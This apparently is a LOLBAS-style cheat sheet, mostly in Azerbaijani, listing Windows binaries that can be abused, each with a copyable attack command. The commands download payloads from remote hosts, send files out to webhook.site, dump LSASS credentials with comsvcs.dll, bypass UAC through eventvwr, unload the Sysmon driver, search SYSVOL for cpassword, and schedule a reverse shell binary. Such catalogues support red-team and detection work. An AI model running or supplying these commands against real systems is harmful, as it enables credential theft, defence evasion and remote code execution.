AddinUtil.exe
Execute
AddinUtil 'Addins.Store' faydalı yükünün mövcud olduğu kataloqdan icra edilir, AddinUtil 'Addins.Store' faydalı yükünü yerinə yetirəcək.
Copy C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddinUtil.exe -AddinRoot:.
AppInstaller.exe
Download
AppInstaller.exe URI üçün standart işləyici tərəfindən yaradılıb, o, paketi URL-dən yükləməyə/quraşdırmağa cəhd edir.
Copy start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Aspnet_Compiler.exe
AWL Bypass
Quraşdırma Provayderi və lazımi qovluq strukturu ilə C# kodunu yerinə yetirin.
Copy C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u
At.exe
Execute
Hər gün müəyyən bir vaxtda yerinə yetirmək üçün təkrarlanan tapşırıq yaradın.
Copy C:\Windows\System32\at.exe 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
Atbroker.exe
Execute
Qeydiyyatdan keçmiş Assistive Technology (AT) işə salın.
Copy ATBroker.exe /start malware
Bash.exe
bash.exe-dən calc.exe-ni icra edir
Bitsadmin.exe
Alternate data streams
Copy bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1
CertOC.exe
Execute
Copy certoc.exe -LoadDLL "C:\test\calc.dll"
CertReq.exe
Download
Copy CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
Certutil.exe
Download,Encode,Decode
Copy certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName
Cmd.exe
Download,Upload
Müəyyən edilmiş faylı WebDAV serverindən hədəf fayla yükləyir.Müəyyən edilmiş faylı WebDAV serverinə yükləyir.
Copy type \\webdav-server\folder\file.ext > C:\Path\file.ext
type C:\Path\file.ext > \\webdav-server\folder\file.ext
Cmdkey.exe
Credentials
Cmstp.exe
Execute
Copy cmstp.exe /ni /s c:\cmstp\CorpVPN.inf
Colorcpl.exe
Copy
ConfigSecurityPolicy.exe
Upload,Download
Copy ConfigSecurityPolicy.exe C:\Windows\System32\calc.exe https://webhook.site/xxxxxxxxx?encodedfile
ConfigSecurityPolicy.exe https://example.com/payload
Conhost.exe
Execute
Csc.exe
Compile
File.cs-də saxlanılan C# kodunu tərtib etmək və tərtib edilmiş versiyanı My.exe-yə çıxarmaq üçün CSC.EXE-dən istifadə edin.
Copy csc.exe -out:My.exe File.cs
csc -target:library File.cs
DeviceCredentialDeployment.exe
Conceal
Copy DeviceCredentialDeployment
Diskshadow.exe
Dump,Execute
Hazırlanmış disk kölgəsi skriptindən diskshadow.exe istifadə edərək əmrləri yerinə yetirin.
Copy diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
Eventvwr.exe
UAC Bypass
Başlanğıc zamanı eventvwr.exe, eventvwr.msc saxlanan konsol faylını açmaq üçün istifadə edilən mmc.exe-nin yeri üçün HKCU\Software\Classes\mscfile\shell\open\command reyestr dəyərini yoxlayır. Bu reyestr dəyərinə başqa ikili və ya skriptin yeri əlavə edilərsə, o, istifadəçiyə UAC sorğusu göstərilmədən yüksək bütövlükdə proses kimi icra olunacaq.
Copy ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Findstr.exe
Credentials,Download
SYSVOL-da saxlanılan Qrup Siyasəti fayllarında saxlanılan parolu axtarın.
Copy findstr /S /I cpassword \\sysvol\policies\*.xml
fltMC.exe
Tamper
Təhlükəsizlik agentləri tərəfindən istifadə edilən sürücünü yükdən çıxarır
Copy fltMC.exe unload SysmonDrv
Ftp.exe
Execute
Copy echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
Msdt.exe
Execute,AWL bypass
Copy msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Psr.exe
Reconnaissance
GUI yaratmadan istifadəçi ekranını yazın. Siz qeydi dayandırmaq və çıxış faylı yaratmaq üçün "psr.exe /stop" istifadə etməlisiniz.
Copy psr.exe /start /output D:\test.zip /sc 1 /gui 0
Pester.bat
Execute
Copy Pester.bat [/help|?|-?|/?] "$null; notepad"
Pubprn.vbs
Execute
Copy pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
devtunnel.exe
Download
8080 portunda yerli olaraq yerləşdirilən xidmət üçün yönləndirilmiş portun internetdə nümayiş etdirilməsinə icazə verilir.
Copy devtunnel.exe host -p 8080
Wsl.exe
Execute,Download
Copy wsl.exe -e /mnt/c/Windows/System32/calc.exe
Winword.exe
Download
Downloads payload from remote server
Copy winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
VSIISExeLauncher.exe
Execute
Copy VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here"
Tracker.exe
Awl Bypass
Copy Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Squirrel.exe
Download, Execute
Copy squirrel.exe --download [url to package]
squirrel.exe --update [url to package]
squirrel.exe --updateRollback=[url to package]
SQLToolsPS.exe
Execute
Modul və ScriptBlock Girişi olmadan SQL Server PowerShell mini konsolunu işə salın.
Copy SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Sqldumper.exe
Dump
Copy sqldumper.exe 464 0 0x0110
Remote.exe
Execute
Powershell-i remote.exe-nin uşaq prosesi kimi yaradır
Copy Remote.exe /s "powershell.exe" anythinghere
ProtocolHandler.exe
Uzaq serverdən yükü endirir
Copy ProtocolHandler.exe https://example.com/payload
OpenConsole.exe
Execte
Mspub.exe
Download
Copy mspub.exe https://example.com/payload
Msdeploy.exe
Execute,AWL Bypass
Copy msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Mftrace.exe
Execute
Excel.exe
Download
Copy Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
DumpMinitool.exe
Dump
Copy DumpMinitool.exe --file c:\users\mr.d0x\dump.txt --processId 1132 --dumpType Full
Dump64.exe
Dump
Creates a memory dump of the LSASS process.
Copy dump64.exe <pid> out.dmp
Dotnet.exe
Execute
Copy dotnet.exe [PATH_TO_DLL]
Devinit.exe
MSI faylını C:\Windows\Installer-ə yükləyir və sonra quraşdırır.
Copy devinit.exe run -t msi-install -i https://example.com/out.msi
csi.exe
Execute
Createdump.exe
Dump
Copy createdump.exe -n -f dump.dmp [PID]
Comsvcs.dll
Dump
Copy rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
Shdocvw.dll
Execute
Copy rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
Mshtml.dll
Execute
Copy rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
code.exe
Websockets vasitəsilə global.rel.tunnels.api.visualstudio.com üzərindən əks PowerShell bağlantısını işə salır; əmr
Copy code.exe tunnel --accept-server-license-terms --name "tunnel-name"
Wsreset.exe
UAC Bypass
Wmic.exe
Alternate DATA Streams
Copy wmic.exe process call create "c:\ads\file.txt:program.exe"
Unregmp2.exe
Execute
Copy rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
ssh.exe
Execute
Copy ssh localhost calc.exe
Sc.exe
Copy sc create evilservice binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" DisplayName= "evilservice" start= auto\ & sc start evilservice
Rundll32.exe
Execute
Copy rundll32.exe AllTheThingsx64,EntryPoint
Last updated 11 months ago